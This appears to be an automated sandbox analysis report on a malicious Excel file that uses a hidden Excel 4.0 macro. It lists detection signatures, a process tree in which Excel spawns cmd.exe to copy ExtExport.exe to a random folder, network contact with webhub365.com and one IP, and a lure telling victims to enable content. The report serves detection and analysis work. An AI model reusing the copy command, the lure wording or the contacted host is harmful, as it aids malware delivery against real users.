Play interactive tour

Edit tour

Analysis Report document-47-2637.xls

Overview

General Information

Sample Name:	document-47-2637.xls
Analysis ID:	432926
MD5:	92dcc47a1a044fc3a2328ec6eef3918b
SHA1:	6f9266a6c0b702cbaa0a3583df5c8cd1357eae35
SHA256:	ac4b99079b1ceb11db593097e421de9d9092765feedc23a3ab8ef912b292c988
Tags:	xls
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Checks if browser processes are running

Contains functionality to compare user and computer (likely to detect sandboxes)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Sigma detected: Microsoft Office Product Spawning Windows Shell

Allocates a big amount of memory (probably used for heap spraying)

Binary contains a suspicious time stamp

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Sample execution stops while process was sleeping (likely an evasion)

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

EXCEL.EXE (PID: 6968 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

cmd.exe (PID: 7156 cmdline: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nnAzot.exe (PID: 4600 cmdline: 'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7 MD5: CE639EB63B7C1C1EC94651B65CCEC383)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe, CommandLine: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6968, ProcessCommandLine: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe, ProcessId: 7156

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: document-47-2637.xls	Virustotal: Detection: 26%	Perma Link
Source: document-47-2637.xls	Metadefender: Detection: 22%	Perma Link
Source: document-47-2637.xls	ReversingLabs: Detection: 15%

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 198.244.146.96:443 -> 192.168.2.4:49736 version: TLS 1.2

Source:	Binary string: extexport.pdbGCTL source: nnAzot.exe, 00000005.00000000.666770148.0000000001151000.00000020.00020000.sdmp, nnAzot.exe.2.dr
Source:	Binary string: extexport.pdb source: nnAzot.exe, nnAzot.exe.2.dr

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\cmd.exe

Source: excel.exe

Memory has grown: Private usage: 1MB later: 79MB

Source: global traffic

DNS query: name: webhub365.com

Source: global traffic

TCP traffic: 192.168.2.4:49736 -> 198.244.146.96:443

Source: global traffic

TCP traffic: 192.168.2.4:49736 -> 198.244.146.96:443

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS traffic detected: queries for: webhub365.com

Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://api.office.net
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://augloop.office.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://cdn.entity.
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://cortana.ai
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://cr.office.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://directory.services.
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://graph.windows.net
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://login.windows.local
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://management.azure.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://management.azure.com/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://tasks.office.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 9C265DD6-ED91-4AAE-9C37-56E57236292F.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736

Source: unknown

HTTPS traffic detected: 198.244.146.96:443 -> 192.168.2.4:49736 version: TLS 1.2

E-Banking Fraud:

Checks if browser processes are running

Show sources

Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe	Code function: GetModuleFileNameW,PathFindFileNameW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,StrStrIW,_wcsicmp,_wcsicmp,StrCmpICW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp, IEXPLORE.EXE	5_2_01156422
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe	Code function: GetModuleFileNameW,PathFindFileNameW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,StrStrIW,_wcsicmp,_wcsicmp,StrCmpICW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp, microsoftedge.exe	5_2_01156422
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe	Code function: GetModuleFileNameW,PathFindFileNameW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,StrStrIW,_wcsicmp,_wcsicmp,StrCmpICW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp, microsoftedgecp.exe	5_2_01156422
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe	Code function: GetModuleFileNameW,PathFindFileNameW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,StrStrIW,_wcsicmp,_wcsicmp,StrCmpICW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp, microsoftedgesh.exe	5_2_01156422

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing" and then click "Enable Content". Sheet1 before,2,9,2,sheet i 'I Ready O Type her
Source: Screenshot number: 4	Screenshot OCR: Enable Content". Sheet1 before,2,9,2,sheet i 'I Ready O Type here to search Ki E a a g xg P

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: document-47-2637.xls

Initial sample: CALL

Found abnormal large hidden Excel 4.0 Macro sheet

Show sources

Source: document-47-2637.xls

Initial sample: Sheet size: 14533

Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe

Code function: 5_2_01156EB1

5_2_01156EB1

Source: Joe Sandbox View

Dropped File: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe 2D2EAD13B2796AD58D070DC1FD36961866F25E1E436661C760A879EAC35982F9

Source: classification engine

